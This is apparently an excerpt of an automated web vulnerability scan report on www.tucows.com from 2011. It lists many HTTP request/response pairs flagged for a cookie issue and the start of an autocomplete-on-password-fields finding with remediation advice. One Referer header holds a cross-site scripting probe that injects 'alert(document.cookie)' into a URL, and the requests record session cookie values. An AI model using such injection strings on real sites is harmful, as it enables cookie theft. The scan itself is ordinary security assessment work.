GET /images/newassets/privacy.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:13 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/safesearchtoggle.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:57 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/search.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/sitemap.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:11 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/terms.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:22 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/warningcow200.png HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 20:50:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32690
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:26:53 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84555
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /preview/194850/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:14 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 37121
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 284258
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /software.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:01 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 49878
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Download Windows Fre ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /terms.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:26 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 38411
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
4. Password field with autocomplete enabledpreviousnext There are 62 instances of this issue:
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).